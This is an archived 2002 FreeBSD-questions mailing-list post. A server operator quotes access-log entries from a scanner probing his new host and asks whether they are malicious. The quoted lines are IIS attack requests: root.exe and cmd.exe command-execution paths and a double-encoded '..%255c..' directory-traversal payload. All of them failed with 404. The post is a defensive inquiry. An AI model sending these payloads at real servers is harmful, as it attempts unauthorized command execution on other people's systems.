Date: Fri, 22 Feb 2002 10:26:02 -0500 From: Jim Freeze <jfreeze@freebsdportal.com> To: freebsd-questions@freebsd.org Subject: Script Kiddies Trying to Hack Me? Message-ID: <20020222102602.A14033@freebsdportal.com>
next in thread | raw e-mail | index | archive | help
Hi: I was just browsing my log files on a site/ip address that has been live less than 12 hrs and came across: 63.219.136.226 - - [22/Feb/2002:09:29:18 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 285 63.219.136.226 - - [22/Feb/2002:09:29:18 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 283 63.219.136.226 - - [22/Feb/2002:09:29:19 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 63.219.136.226 - - [22/Feb/2002:09:29:19 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 293 63.219.136.226 - - [22/Feb/2002:09:29:19 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0 " 404 307 This looks like someone trying to get access to an NT system command, and my guess is that they are up to no good. Is this a fair assumption? I would guess that this is fairly common and that these guys are scanning new machines all the time. Makes me want to be sure that I get a firewall up before I put a machine on the net. -- Jim Freeze "Give some people an attoparsec and they'll take 16.093 Tera-angstroms" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20020222102602.A14033>